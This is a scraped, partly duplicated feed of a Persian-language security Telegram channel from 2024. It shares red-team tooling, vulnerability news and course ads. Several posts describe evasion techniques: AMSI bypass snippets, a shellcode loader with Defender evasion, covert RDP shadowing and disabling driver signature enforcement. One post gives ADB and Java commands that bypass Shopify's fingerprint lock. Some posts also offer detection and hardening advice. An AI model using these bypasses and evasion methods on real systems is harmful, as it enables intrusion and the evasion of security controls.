⭕️ ابزار .Net ای مفیدی توسعه داده شده که بدون دسترسی ادمین، اقدام به جمع آوری Windows Defender Exclusions و
Attack Surface Reduction یا به اصطلاح ASR رول ها میکند.
از ویژگی های این ابزار به میتوان به موارد زیر اشاره کرد:
#RedTeam #BlueTeam #Evasion
@securation
Attack Surface Reduction یا به اصطلاح ASR رول ها میکند.
از ویژگی های این ابزار به میتوان به موارد زیر اشاره کرد:
Local and Remote Query Support: Seamlessly query Windows Defender settings on both local and remote machines.
User-Context: Operates efficiently from a low-user context, eliminating the need for administrative permissions.
Windows Defender Exclusions: Retrieve and list all exclusion paths configured in Windows Defender.
Attack Surface Reduction (ASR) Rules: Enumerate ASR rules, displaying both the IDs and their corresponding names for easy identification.
Triggered ASR Events: Extract and list all triggered ASR events to monitor system security activities.
Detailed Output: Presents information in a clear, tabulated format for easy reading and analysis.
Getting ASR rules from MSFT_MpPreference class, it is under the following namespace root\Microsoft\Windows\Defender. and you don't need admin privileges.
Works from low user context .
Supports local & remote queries
Extracts paths from Event ID 5007 and ASR from Event ID 1121 using regex
Enumerates ASR rules from MSFT_MpPreference WMI class(works perfectly from low user context as well).
Displays results in a clean, tabulated format
works smoothly with inline-assembly
#RedTeam #BlueTeam #Evasion
@securation
GitHub
GitHub - 0xsp-SRD/MDE_Enum: comprehensive .NET tool designed to extract and display detailed information about Windows Defender…
comprehensive .NET tool designed to extract and display detailed information about Windows Defender exclusions and Attack Surface Reduction (ASR) rules without Admin privileges - 0xsp-SRD/MDE_Enum
⭕️پلیس سایبری اوکراین یک شخص 28 ساله رو در ارتباط با گنگ باج افزارهای LockBit و Conti بازداشت کرده.
شخص بازداشت شده در کار توسعه ی Crypter و راه هایی برای بایپس و فرار از تشخیص بدافزار فعال بوده.
https://thehackernews.com/2024/06/ukraine-police-arrest-suspect-linked-to.html
#LockBit #Ransomware
@securation
شخص بازداشت شده در کار توسعه ی Crypter و راه هایی برای بایپس و فرار از تشخیص بدافزار فعال بوده.
https://thehackernews.com/2024/06/ukraine-police-arrest-suspect-linked-to.html
#LockBit #Ransomware
@securation
⭕️ثبت نام برای مسابقات امنیت Google CTF 2024 که 1 تا 3 تیر برگزار میشه آغاز شده.
اگر علاقه مند به محک زدن خودتون هستید بنظرم این مسابقه رو ثبتنام کنید.
موضوع چالشها :
Reverse Engineering
Web
Pwn
Crypto
Forensic
ثبت نام:
capturetheflag.withgoogle.com
#GoogleCTF2024
@securation
اگر علاقه مند به محک زدن خودتون هستید بنظرم این مسابقه رو ثبتنام کنید.
موضوع چالشها :
Reverse Engineering
Web
Pwn
Crypto
Forensic
ثبت نام:
capturetheflag.withgoogle.com
#GoogleCTF2024
@securation
Forwarded from کانال بایت امن
#eBook #WindowsPE #DWORD
🏳️ باز نویسی و ترجمه کتاب Windows PE权威指南
🔥 این کتاب بهطور جامع و مفصل به تحلیل فرمت فایل PE و تکنیکهای برنامهنویسی مرتبط با آن میپردازد و جنبههای مختلف امنیتی و مدیریت پروسس های سیستمی و مکانیسمهای سطح پایین آن را مورد بررسی قرار میدهد.
فصل اول : محیط توسعه Windows PE
تعداد صفحات : 29 صفحه
💎دریافت فصل اول | گیتهاب کتاب
🦅 کانال بایت امن | گروه بایت امن
_
با توجه به تاریخ انتشار کتاب Windows PE权威指南 که به زبان چینی و در سال 2011 به چاپ رسیده است، در بازنویسی این کتاب سعی کردهام مطالب و ابزارهای قدیمی را حذف کنم و از نرمافزارهای به روز و مطالب جدید استفاده کنم. به همین دلیل ممکن است بعضی از موضوعات بهطور کامل تغییر یا جایگزین شوند و یا حتی بر حسب نیاز مطالب جدیدی اضافه گردند.
سطح مطالب این کتاب پیشرفته است و موضوعاتی که مطرح میشوند ممکن است نیاز به داشتن پیشنیاز باشند. به طور مثال، کدنویسی پروژهها به زبان اسمبلی و در محیط برنامهنویسی انجام میشود، بنابراین شما باید زبان اسمبلی را بدانید و با محیط برنامهنویسی به زبان اسمبلی آشنایی داشته باشید. تمرکز این کتاب بر تشریح ساختار فایلهای PE خواهد بود و به آموزش پیشنیازها یا سایر موارد اشاره نخواهیم کرد. با این حال، در هر فصل بخشی تحت عنوان منابع وجود دارد که برای درک و آشنایی بیشتر شما با بعضی مطالب، منابع مناسبی معرفی خواهند شد.
فصل اول : محیط توسعه Windows PE
تعداد صفحات : 29 صفحه
💎دریافت فصل اول | گیتهاب کتاب
_
Please open Telegram to view this post
VIEW IN TELEGRAM
⭕️ تکنیکی کشف شده که با استفاده از ایجاد struct در فایل Settings.json پروژه Bloxstrap که نوعی Bootstrapper پروژه Roblox است اقدام به ایجاد Persistance میکند.
در ویدیو ضمیمه شده POC این تکنیک نشان داده شده است.
https://github.com/EvilBytecode/Bloxstrap-Persistance
#RedTeam #Persistance
@securation
در ویدیو ضمیمه شده POC این تکنیک نشان داده شده است.
https://github.com/EvilBytecode/Bloxstrap-Persistance
#RedTeam #Persistance
@securation
Streamable
Watch POC | Streamable
Watch "POC" on Streamable.
⭕️ آسیب پذیری Directory Traversal در Serv-U از محصولات SolarWinds کشف شده که به اتکر اجازه ی دسترسی به فایلهای مهم میزبان را میدهد.
لینک تحلیل آسیب پذیری :
https://attackerkb.com/topics/2k7UrkHyl3/cve-2024-28995/rapid7-analysis
لینک Poc آسیب پذیری :
https://github.com/rapid7/metasploit-framework/pull/19255
@securation
لینک تحلیل آسیب پذیری :
https://attackerkb.com/topics/2k7UrkHyl3/cve-2024-28995/rapid7-analysis
لینک Poc آسیب پذیری :
https://github.com/rapid7/metasploit-framework/pull/19255
@securation
⭕️شرایط اعلامی مرکز مدیریت راهبردی #افتا برای مجوز قرارداد خرید آنتی ویروس و EDR کسپر در زیرساختهای حیاتی کشور.
افتا گفته شرکت تامین کننده باید تضمین بده که EDR بایپس نمیشه و مثلا اگر قرارداد یکساله بستید ،تا یکسال بتونه کار کنه بدون مشکل:)
آقای افتا سلام و عرض خسته نباشید ، برای پادوی دوزاری بنام آنتی ویروس پادویش هم همچین نامه ای حاضر هستید بنویسید؟
آیا افتا حاضر هست همین نامه رو برای شرکت پادویش بنویسه و بگه : اگر بایپس شد تعطیل کنید ؟!
آیا افتا حاضر هست صد ها محصول Open Source رو که شرکت های به نام توخالی دانش بنیان آوردن یک UI تغییر دادند و فارسی سازی کردند همین تست ها و همین شرایط رو بنویسه؟
قدیمی ترین فایروال که بنام فایروال ایرانی و بومی هست ، سورس کد اش از تایوان میاد و توی تمام سازمانهای حاکمیتی داره استفاده میشه ، الان شما شدی زرنگ جمع ، بفکر بایپس نشدن افتادید؟
وقتی به کسی که فکر میکنه Owasp یک سیستم عامل لینوکسی هست مجوز افتا میدید و به کسی که اقتصاد خونده و یکماهه ویدیوهای CEH میبینه بخاطر رانت پدرش میشه کارشناس افتا ، طبیعیه که ندونید بایپس چیه و راه اصولی کجاست.
@securation
افتا گفته شرکت تامین کننده باید تضمین بده که EDR بایپس نمیشه و مثلا اگر قرارداد یکساله بستید ،تا یکسال بتونه کار کنه بدون مشکل:)
آقای افتا سلام و عرض خسته نباشید ، برای پادوی دوزاری بنام آنتی ویروس پادویش هم همچین نامه ای حاضر هستید بنویسید؟
آیا افتا حاضر هست همین نامه رو برای شرکت پادویش بنویسه و بگه : اگر بایپس شد تعطیل کنید ؟!
آیا افتا حاضر هست صد ها محصول Open Source رو که شرکت های به نام توخالی دانش بنیان آوردن یک UI تغییر دادند و فارسی سازی کردند همین تست ها و همین شرایط رو بنویسه؟
قدیمی ترین فایروال که بنام فایروال ایرانی و بومی هست ، سورس کد اش از تایوان میاد و توی تمام سازمانهای حاکمیتی داره استفاده میشه ، الان شما شدی زرنگ جمع ، بفکر بایپس نشدن افتادید؟
وقتی به کسی که فکر میکنه Owasp یک سیستم عامل لینوکسی هست مجوز افتا میدید و به کسی که اقتصاد خونده و یکماهه ویدیوهای CEH میبینه بخاطر رانت پدرش میشه کارشناس افتا ، طبیعیه که ندونید بایپس چیه و راه اصولی کجاست.
@securation
⭕️ حالا دیگه آمریکا هم از افتا یاد میگیره که استفاده از محصولات Kaspersky رو توی کشورش ممنوع کنه.
قبلا آمریکا از سیستم بهداشت کشور ایران الگو میگرفت. :دی
https://www.bleepingcomputer.com/news/security/biden-bans-kaspersky-antivirus-software-in-us-over-security-concerns/
@securation
قبلا آمریکا از سیستم بهداشت کشور ایران الگو میگرفت. :دی
https://www.bleepingcomputer.com/news/security/biden-bans-kaspersky-antivirus-software-in-us-over-security-concerns/
@securation
⭕️ پروژه ای به جهت لود Shellcode به صورت Direct Syscall و Payload Encryption توسعه داده شده، در دید اول صرفا شاید یک تمرین دوره MalDev Academy باشد، اما با بررسی متوجه میشویم که کارایی بیشتر هم دارد.
این پروژه با C2 معروف Havoc و بر روی Defender تست شده است.
از ویژگی های این پروژه میتوان به موارد زیر اشاره کرد:
#RedTeam #Evasion
@securation
این پروژه با C2 معروف Havoc و بر روی Defender تست شده است.
از ویژگی های این پروژه میتوان به موارد زیر اشاره کرد:
Payload builder
AES encrypted payload
XOR protected encryption key
Remote mapping injection via direct syscalls (Hell's Gate)
Payload staging via remote webserver
Brute-force key decryption during runtime
API hashing
Delayed execution via API Hammering
Self-deletion if debugger is detected
IAT Camouflage
#RedTeam #Evasion
@securation
GitHub
GitHub - jakobfriedl/BenevolentLoader: Shellcode loader using direct syscalls via Hell's Gate and payload encryption.
Shellcode loader using direct syscalls via Hell's Gate and payload encryption. - jakobfriedl/BenevolentLoader
⭕️ پروژه بسیار خوبی به جهت Remote Kerberos Relay ایجاد شده که کاربرد های مختلفی دارد.
این پروژه متشکل از موارد زیر است:
با تجمیع ابزار و تکینک های نام برده شده اقدام به دسترسی ها و اهداف مورد نظر میکند.
#RedTeam #Kerberos #Relay
@securation
این پروژه متشکل از موارد زیر است:
ابزار KrbRelay و KrbRealayUp
تکنیک CertifiedDCOM
اکسپلویت SilverPotato
با تجمیع ابزار و تکینک های نام برده شده اقدام به دسترسی ها و اهداف مورد نظر میکند.
#RedTeam #Kerberos #Relay
@securation
GitHub
GitHub - CICADA8-Research/RemoteKrbRelay: Remote Kerberos Relay made easy! Advanced Kerberos Relay Framework
Remote Kerberos Relay made easy! Advanced Kerberos Relay Framework - CICADA8-Research/RemoteKrbRelay
Forwarded from کانال بایت امن
Packer-Protector-Sources-By-@securebyte.rar
13 MB
#Source #PE
I have been collecting this package, which includes sources for packers and protectors, for years and shared it on the Exetools forum in 2014. I am grateful to the friends who helped me gather this excellent resource.
This collection includes packers and protectors written in programming languages such as C, C++, ASM, Delphi, and VB. If you are interested in PE topics and programming packers and protectors, this package is ideal for you.
Exetools link: https://forum.exetools.com/showthread.php?t=16128
If you can also help in collecting more sources, please get in touch with me.🌐 @YMahmoudnia
🦅 کانال بایت امن | گروه بایت امن
_
I have been collecting this package, which includes sources for packers and protectors, for years and shared it on the Exetools forum in 2014. I am grateful to the friends who helped me gather this excellent resource.
This collection includes packers and protectors written in programming languages such as C, C++, ASM, Delphi, and VB. If you are interested in PE topics and programming packers and protectors, this package is ideal for you.
Exetools link: https://forum.exetools.com/showthread.php?t=16128
If you can also help in collecting more sources, please get in touch with me.
_
Please open Telegram to view this post
VIEW IN TELEGRAM
⭕️پروژه پایتونی توسعه داده شده است که به جهت ایجاد Socks Proxy با IP Source های به صورت رندوم، با استفاده از تکنیک Round Robin، به صورت SSH Tunnels یا حالت های دیگر مورد استفاده است.
از مواردی که در آن مفید هست این ابزار، میتوان به WAF Bypass، Password Spraying ، Web scraping اشاره نمود.
توضیحات تکمیلی درباره عملکرد این ابزار:
#RedTeam #OpSec
@securation
از مواردی که در آن مفید هست این ابزار، میتوان به WAF Bypass، Password Spraying ، Web scraping اشاره نمود.
توضیحات تکمیلی درباره عملکرد این ابزار:
TREVORproxy has two modes of operation: a Subnet Proxy and an SSH Proxy:
Subnet Proxy mode uses the AnyIP feature of the Linux kernel to assign an entire subnet to your network interface, and give every connection a random source IP address from that subnet.
E.g. if your cloud provider gives you a /64 IPv6 range, you can send your traffic from over eighteen quintillion (18,446,744,073,709,551,616) unique IP addresses.
SSH Proxy mode combines iptables with SSH's SOCKS proxy feature (ssh -D) to round-robin packets through remote systems (cloud VMs, etc.)
NOTE: TREVORproxy is not intended as a DoS tool, as it does not "spoof" packets. It is a fully-functioning SOCKS proxy, meaning that it is designed to accept return traffic.
#RedTeam #OpSec
@securation
GitHub
GitHub - blacklanternsecurity/TREVORproxy: A SOCKS proxy written in Python that randomizes your source IP address. Round-robin…
A SOCKS proxy written in Python that randomizes your source IP address. Round-robin your evil packets through SSH tunnels or give them billions of unique source addresses! - blacklanternsecurity/TR...
This media is not supported in your browser
VIEW IN TELEGRAM
⭕️Bypass of biometrics security functionality (FingerPrint) of Shopify using DeepLink
Exploit using ADB:
Exploit using Java Code:
https://hackerone.com/reports/637194
#Android
@Securation
Exploit using ADB:
adb shell am start -n com.shopify.mobile/com.shopify.mobile.lib.app.DeepLinkActivity -d 'https://www.shopify.com/admin/products'
Exploit using Java Code:
Intent intent = new Intent();
intent.setClassName("com.shopify.mobile", "com.shopify.mobile.lib.app.DeepLinkActivity");
intent.setData(Uri.parse("https://www.shopify.com/admin/products"));
startActivity(intent);
https://hackerone.com/reports/637194
#Android
@Securation
⭕️ یکی از ویژگی هایی که توی مراحل RedTeam به کار میاد و شاید کمتر کسی بهش بربخوره اینشکلی هست که ، فرض کنید سیستم ها ویژگی RDP بر روی آنها فعال است، اما پورت مربوط به آن توسط فایروال مسدود باشد و پورت SMB یعنی 445 در دسترس باشد ، با استفاده از RDP Shadow این امکان را داریم از این طریق به هدف دسترسی RDP داشته باشیم به طوری که فرد متوجه نشود.
با پرداختن به این مقاله ، تکنیک های Persistence و Backdoor با این روش و تکنیک های OpSec مورد استفاده در آن را متوجه میشویم.
در آخر برای شناسایی این تکنیک میتوان مشخص کرد اگر مقدار Shadow در کلید:
ایجاد یا تغییر کرد هشدار داده شود.
همچنین برای امن سازی آن میتوان به موارد زیر اشاره نمود:
#RedTeam #RDP
@securation
با پرداختن به این مقاله ، تکنیک های Persistence و Backdoor با این روش و تکنیک های OpSec مورد استفاده در آن را متوجه میشویم.
در آخر برای شناسایی این تکنیک میتوان مشخص کرد اگر مقدار Shadow در کلید:
HKLM\Software\Policies\Microsoft\Windows NT\Terminal Services
ایجاد یا تغییر کرد هشدار داده شود.
همچنین برای امن سازی آن میتوان به موارد زیر اشاره نمود:
To prevent shadowing altogether, using application whitelisting, it is possible to block the RdpSaUacHelper.exe, RdpSaProxy.exe and RdpSa.exe processes from launching
In the group policy, one can explicitly set the Shadow setting to require the user’s consent before shadowing or controlling the session so the backdoor is less effective; this assumes that an attacker at a later moment does not have sufficient privileges anymore to set the Shadow key in the registry to the value of their liking
The WINSTATION_SHADOW permission can be removed from all entries in the Win32_TSAccount WMI class, although an attacker with administrative permissions can provide themselves this permission again
#RedTeam #RDP
@securation
BITSADMIN Blog
Spying on users using Remote Desktop Shadowing - Living off the Land
How to spy on users on remote computers making only use of Windows' built-in functionality? This post will explain the steps to (ab)use Windows' Remote Desktop feature to view a remote user's desktop using native Windows functionality without them noticing…
⭕️ آسیب پذیری جدید به نام regreSSHion روی OpenSSH کشف شده که به هکرها اجازه اجرای کد از راه دور را میدهد.
شماره CVE ثبت شده CVE-2024-6387 که تحلیل این آسیب پذیری رو میتونید اینجا بخونید.
در ایران بالای 85 هزار سرور آسیب پذیر به این آسیب پذیری RCE وجود داره لطفا اطلاع رسانی کنید.
https://www.qualys.com/regresshion-cve-2024-6387/
Poc : https://github.com/zgzhang/cve-2024-6387-poc/blob/main/7etsuo-regreSSHion.c
@securation
شماره CVE ثبت شده CVE-2024-6387 که تحلیل این آسیب پذیری رو میتونید اینجا بخونید.
در ایران بالای 85 هزار سرور آسیب پذیر به این آسیب پذیری RCE وجود داره لطفا اطلاع رسانی کنید.
https://www.qualys.com/regresshion-cve-2024-6387/
Poc : https://github.com/zgzhang/cve-2024-6387-poc/blob/main/7etsuo-regreSSHion.c
@securation
⭕️ اگر عمیق تر به معماری امنیتی و احراز هویت در سرویس مایکروسافت رجوع کرده باشید متوجه خواهید شد که مسئولیت تمامی احراز هویت ها و تعامل آن ها با هم با SSPI یا Security Support Provider Interface است.
این معماری که به طوری نوعی از WinApi ها هم است، در دو سطح User-Mode و Kernel-Mode است، در سطح کرنل از درایوری به اسم KSecDD.sys استفاده میشود.
با بررسی بیشتر متوجه میشویم عملیات IOCTL_KSEC_IPC_SET_FUNCTION_RETURN در KSSPI دسترسی lSASS به اجرای دستور به صورت دلخواه در آدرس های سطح کرنل ایجاد میکند.
همچنین باید اشاره کرد با شروع فرایند lsass.exe!LsapOpenKsec پروسه LSASS را فراخوانی میکند و با استفاده از عملیات IOCTL_KSEC_CONNECT_LSA خود را به این رابط متصل می کند.
از این نقطه به بعد، هیچ فرآیند دیگری نمی تواند به اینترفیس متصل شود و بنابراین منطقا فقط توسط LSASS راه اندازی می شود.
حال با این توضیحات ما دسترسی آن را داریم که ویژگی Driver Signature Enforcement را غیر فعال کنیم و Unsigned kernel drivers های خود را بدون مشکل Load کنیم.
https://tierzerosecurity.co.nz/2024/04/29/kexecdd.html
#RedTeam #RootKit #Evasion
@securation
این معماری که به طوری نوعی از WinApi ها هم است، در دو سطح User-Mode و Kernel-Mode است، در سطح کرنل از درایوری به اسم KSecDD.sys استفاده میشود.
با بررسی بیشتر متوجه میشویم عملیات IOCTL_KSEC_IPC_SET_FUNCTION_RETURN در KSSPI دسترسی lSASS به اجرای دستور به صورت دلخواه در آدرس های سطح کرنل ایجاد میکند.
همچنین باید اشاره کرد با شروع فرایند lsass.exe!LsapOpenKsec پروسه LSASS را فراخوانی میکند و با استفاده از عملیات IOCTL_KSEC_CONNECT_LSA خود را به این رابط متصل می کند.
از این نقطه به بعد، هیچ فرآیند دیگری نمی تواند به اینترفیس متصل شود و بنابراین منطقا فقط توسط LSASS راه اندازی می شود.
حال با این توضیحات ما دسترسی آن را داریم که ویژگی Driver Signature Enforcement را غیر فعال کنیم و Unsigned kernel drivers های خود را بدون مشکل Load کنیم.
https://tierzerosecurity.co.nz/2024/04/29/kexecdd.html
#RedTeam #RootKit #Evasion
@securation
Docs
Security Support Provider Interface Architecture
Learn about the Windows authentication protocols that are used within the Security Support Provider Interface (SSPI) architecture.
Forwarded from کانال بایت امن
#DWORD #CPL1
📣 ثبت نام دوره دوم آموزش زبان برنامه نویسی C | سطح مقدماتی و متوسط
◀️ با محوریت مهندسی معکوس و برنامه نویسی امن
✈️ مشخصات دوره :
⬅️ سطح دوره : مقدماتی و متوسط
⬅️ تعداد ساعت دوره : 25 ساعت
⬅️ نحوه برگزاری : آفلاین ( ویدیو های رکورد شده + پلیر اختصاصی )
⬅️ زبان دوره : فارسی و انگلیسی
⬅️ تعداد سر فصل : 25
⬅️ ارزیابی و مدرک پایان دوره : دارد
⬅️ گروه پشتیبانی : دارد
✈️ نکات کلیدی دوره :
⬅️ آموزش پیشنیاز های لازم و مفاهیم برنامه نویسی
⬅️ شامل استاندارد های ANSI C تا C17
⬅️ کد نویسی در محیط های برنامه نویسی Visual Studio و Visual Studio Code
⬅️ کد نویسی در سیستم عامل های ویندوز و لینوکس
⬅️ ساخت برنامه های Cross-Platform
⬅️ کار با ابزار های CMake و Automake
⬅️ آموزش به صورت پروژه محور و بررسی خلاصه محتوای هر بخش در پایان آن
⬅️ حل سوالات مربوط به مصاحبه های کاری و مرور کردن مطالب در انتهای دوره
⬅️ جلسات آنلاین رفع اشکال و پرسش و پاسخ
⬅️ مناسب برای تمامی گرایش های نیازمند به زبان برنامه نویسی C
◀️ در این دوره فرض بر این گرفته شده که زبان C به عنوان اولین زبانی است که قصد یادگیری آن را دارید. به همین دلیل، تمامی پیشنیازها به طور کامل توضیح داده شدهاند و تمامی بخشها به ریز و با نکات کاربردی بیان شدهاند.
در هر مرحله از دوره، مفاهیم با جزئیات توضیح داده شده و با مثالهای عملی و تمرینهای متنوع پشتیبانی میشوند تا یادگیری به بهترین شکل ممکن انجام شود. هدف این است که شما بتوانید با اعتماد به نفس و درک عمیق، برنامهنویسی به زبان C را آغاز کنید.
🎁 طبق روال همیشگی، دانشجویان سایر دوره های آکادمی DWORD از تخفیف برخوردار خواهند بود.
🎁 در صورت تمایل به شرکت در دوره و پرداخت شهریه به صورت اقساط با مدرس دوره در ارتباط باشید.
✈️ مشاهده اطلاعات کامل دوره، سرفصل و ثبت نام
🎤 ارتباط با مدرس دوره
▶️ پلی لیست ویدیو های دمو دوره
🦅 کانال بایت امن | گروه بایت امن
_
در هر مرحله از دوره، مفاهیم با جزئیات توضیح داده شده و با مثالهای عملی و تمرینهای متنوع پشتیبانی میشوند تا یادگیری به بهترین شکل ممکن انجام شود. هدف این است که شما بتوانید با اعتماد به نفس و درک عمیق، برنامهنویسی به زبان C را آغاز کنید.
_
Please open Telegram to view this post
VIEW IN TELEGRAM
⭕️ در سال 2016 محققی به اسم Matt Greabers تکنیکی برای دور زدن AMSI ایجاد کرد به اسم Reflection، زمانی که این تکنیک را با Method Swapping ترکیب کنیم اصطلاحا MonkeyPatching نیز گفته میشود.
حال به توضیح قسمتی از این تکنیک اشاره میکنیم:
در ادامه نکاتی را برای رعایت OpSec میتوان اشاره کرد:
https://github.com/cybersectroll/TrollAMSI/tree/main
#RedTeam #AMSI
@securation
حال به توضیح قسمتی از این تکنیک اشاره میکنیم:
There is a low detection surface:
statically: because the code profile is so short and it is hard to apply a signature on any part of the common .NET functionality used
dynmically: because of the lack of hooked win32 API calls
Because we are modifying JIT/IL memory which is hard for AV/EDR to monitor or has not been monitored at this point by a lot of vendors
! For some security products, modify method M to pass in empty argument string c.
! For CSHARP example, private static int M(string c, string s) { c = ""; return 1; }
! For POWERSHELL example, class TrollAMSI{static [int] M([string]$c, [string]$s){ $c = ""; return 1}}
! Refer to TrollAMSIdotnet for amsi bypass for Assembly.Load()
Benefits
No P/Invoke or win32 API calls used such as VirtualProtect hence more opsec safe
No amsi.dll patching or byte patching for that matter
در ادامه نکاتی را برای رعایت OpSec میتوان اشاره کرد:
STATIC: obfuscate "AmsiUtils" and "ScanContent" maybe?
DYNAMIC: Nothing much really. Note that Add-Type method will leave disk artifacts, whereas hosting the compiled DLL on a webserver and using Load() is completely in memory
https://github.com/cybersectroll/TrollAMSI/tree/main
#RedTeam #AMSI
@securation
GitHub
GitHub - cybersectroll/TrollAMSI
Contribute to cybersectroll/TrollAMSI development by creating an account on GitHub.
⭕️ اسکریپتی به جهت مانیتور کردن تغییرات Active Directory به صورت RealTime بدون دریافت تمام Object ها توسعه داده شده که،
از Replication Metadata ها و Update Sequence Number یا USN برای فیلتر کردن Object ها استفاده میکند.
این پروژه برگرفته از LDAP Monitor است.
به سوییچ های این ابزار و نحوه استفاده از آن میپردازیم:
#RedTeam #BlueTeam
@securation
از Replication Metadata ها و Update Sequence Number یا USN برای فیلتر کردن Object ها استفاده میکند.
این پروژه برگرفته از LDAP Monitor است.
به سوییچ های این ابزار و نحوه استفاده از آن میپردازیم:
Parameters
DC - domain controller FQDN.
Formatlist - output in list instead of table.
ExcludelastLogonTimestamp - exclude lastLogonTimestamp events from output
DumpAllObjects - dump all active directory before start. In case of changes It will show you all previous values. But in large domains use it on your own risk (time and resource consuming).
Short - in output will be only AttributeName, AttributeValue, LastOriginChangeTime and Explanation.
Output - create XML file with all output.
ExcludeObjectGUID - exclude Active Directory object with specific GUID.
Sleep - time interval between requests for USN number. By default - 30 seconds.
USN - specify started USN.
DisplayXML - display previous captured XML file.
How to use
Domain computer
Just run module in powershell session from domain user. For better performance use domain controller FQDN instead of IP address.
Non-domain computer
Start powershell session with domain user with runas. Check that domain controller accessible. For better performance use domain controller FQDN instead of IP address.
#RedTeam #BlueTeam
@securation
GitHub
GitHub - DrunkF0x/ADSpider: Monitor changes in Active Directory with replication metadata
Monitor changes in Active Directory with replication metadata - DrunkF0x/ADSpider
This media is not supported in your browser
VIEW IN TELEGRAM
⭕️ Android Malware with Fake Extension(PDF) in Whatsapp
در این حمله نفوذگر توسط دستکاری کردن و تغییر نام اکستنشن نمایشی در صفحه چت واتساپ اهداف خود، بدافزار اندرویدی با فرمت apk را با اکستنشن نمایشی pdf در واتساپ برای قربانیان خود ارسال کرده و قربانیان با فرض بر pdf بودن فایل ارسالی، بدافزار را نصب کرده و دیوایس شان آلوده میگردد.
#Android #Malware
@Securation
در این حمله نفوذگر توسط دستکاری کردن و تغییر نام اکستنشن نمایشی در صفحه چت واتساپ اهداف خود، بدافزار اندرویدی با فرمت apk را با اکستنشن نمایشی pdf در واتساپ برای قربانیان خود ارسال کرده و قربانیان با فرض بر pdf بودن فایل ارسالی، بدافزار را نصب کرده و دیوایس شان آلوده میگردد.
#Android #Malware
@Securation